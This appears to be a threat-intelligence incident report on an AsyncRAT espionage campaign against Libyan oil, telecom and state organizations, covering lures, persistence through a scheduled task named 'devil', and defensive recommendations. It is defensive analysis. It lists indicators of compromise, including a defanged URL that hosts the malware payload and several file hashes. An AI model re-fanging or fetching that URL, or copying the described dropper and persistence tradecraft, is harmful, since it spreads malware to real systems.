Full Report
The modular backdoor AsyncRAT was deployed on targeted networks.
Analysis Summary
# Incident Report: Long-running Espionage Campaign Targeting Libyan Infrastructure
## Executive Summary
A sustained cyber-espionage campaign targeted critical Libyan organizations, including an oil refinery, a telecommunications provider, and a state institution, between November 2025 and February 2026. The attackers deployed the modular AsyncRAT backdoor using highly localized spear-phishing lures to facilitate long-term intelligence gathering. The campaign is suspected to be state-sponsored due to the strategic nature of the targets and the use of current geopolitical events as infection bait.
## Incident Details
- **Discovery Date:** February 2026
- **Incident Date:** November 2025 – February 2026 (Potential activity dating back to April 2025)
- **Affected Organization:** Unnamed Libyan Oil Refinery, Telecom organization, and State institution
- **Sector:** Energy (Oil & Gas), Telecommunications, Government
- **Geography:** Libya
## Timeline of Events
### Initial Access
- **Date/Time:** November 2025 (Initial identified compromise)
- **Vector:** Spear-phishing emails
- **Details:** Attackers used "news-of-the-day" lure documents, specifically referencing the assassination of Saif al-Gaddafi and other Libya-specific political themes, to trick users into executing malicious files.
### Lateral Movement
- **Details:** The report indicates the actors maintained a presence on the oil refinery's network for several months (November to February). While specific lateral movement protocols (like SMB or RDP) weren't detailed, the modular nature of AsyncRAT was utilized to maintain visibility across the targeted environments.
### Data Exfiltration/Impact
- **Details:** As a remote access trojan (RAT), AsyncRAT was used for intelligence gathering. Impact included keylogging, screen captures, and remote command execution, likely aimed at monitoring internal communications and operational data.
### Detection & Response
- **How it was discovered:** Security researchers identified malicious files on compromised networks and correlated them with related samples on VirusTotal.
- **Response actions taken:** Investigation by threat intelligence teams; deployment of protections via Symantec and Carbon Black products.
## Attack Methodology
- **Initial Access:** Spear-phishing with localized lures (e.g., *Leaked CCTV footage - Saif al-Gaddafi's assassination.gz*).
- **Persistence:** Creation of a scheduled task named 'devil' using a malicious XML configuration (*Googless.xml*).
- **Privilege Escalation:** Not explicitly detailed, though AsyncRAT typically attempts to bypass UAC or exploit local vulnerabilities once executed.
- **Defense Evasion:** Use of legitimate cloud hosting (Kraken Files) to host payloads; use of PowerShell droppers and VBS scripts to manual execution; obfuscated filenames (e.g., *image.png* for a PowerShell script).
- **Credential Access:** Keylogging functionality within AsyncRAT.
- **Discovery:** System and network reconnaissance via AsyncRAT modular commands.
- **Lateral Movement:** Managed via the AsyncRAT command-and-control (C2) interface.
- **Collection:** Screen captures and keystroke logging.
- **Exfiltration:** Exfiltration of gathered intelligence to external C2 infrastructure.
- **Impact:** Long-term espionage and potential for operational disruption of energy supplies.
## Impact Assessment
- **Financial:** Undisclosed; potential for massive impact if oil production (1.37M barrels/day) was disrupted.
- **Data Breach:** Compromise of sensitive state and corporate communications; volume unknown.
- **Operational:** Sustained unauthorized access to critical infrastructure control or monitoring networks.
- **Reputational:** High impact on state institutions and national security entities.
## Indicators of Compromise
- **Network indicators:**
- `https://hs8.krakenfiles[.]com/uploads/15-02-2026/JCaF7rrPQm/image.png`
- **File indicators (Hashes):**
- `0f3344e672d1ea6cde382b68b27063ed766fced717e9f5f2e15e6c79ce0737f7` (AsyncRAT)
- `c3eef096073dd0873a821c35dd2e7eaf391863264ab72e1b91f2ca73218c2d04` (VBS Downloader)
- `ad4e27fe06fae2325faa2a00be7b41f40aa9c63fe79713597b3330ad7e583ca8` (Names_libya444.vbs)
- **Behavioral indicators:**
- Creation of scheduled task named `devil`.
- Directory use: `C:\Users\Public\Music\/Googless.xml`.
- Execution of `schtasks.exe` with XML parameters.
## Response Actions
- **Containment measures:** Isolation of infected hosts identified via the "devil" scheduled task.
- **Eradication steps:** Removal of malicious VBS and PowerShell scripts; termination of AsyncRAT processes.
- **Recovery actions:** Hardening of email gateways and monitoring for specific Libya-themed phishing lures.
## Lessons Learned
- **Exploitation of Geopolitics:** Attackers successfully capitalized on local political instability and high-profile assassinations to increase the "click rate" of phishing.
- **Living off the Land:** The use of built-in Windows tools (PowerShell, Schtasks, VBS) allowed the threat actor to remain undetected on some networks for over three months.
- **Public Tooling:** The use of AsyncRAT (a public tool) made attribution difficult, demonstrating how state-sponsored actors use "commodity" malware to maintain plausible deniability.
## Recommendations
- **Email Security:** Implement advanced threat protection (ATP) to scan for malicious VBS/PowerShell attachments and URLs within compressed files (.gz).
- **Endpoint Monitoring:** Monitor for the creation of unusual scheduled tasks—particularly those using the `/XML` flag to load configurations from public user folders.
- **User Training:** Conduct localized security awareness training focusing on how threat actors use national news events as social engineering lures.
- **Network Filtering:** Restrict access to unauthorized file-sharing sites (like Kraken Files) from corporate workstations.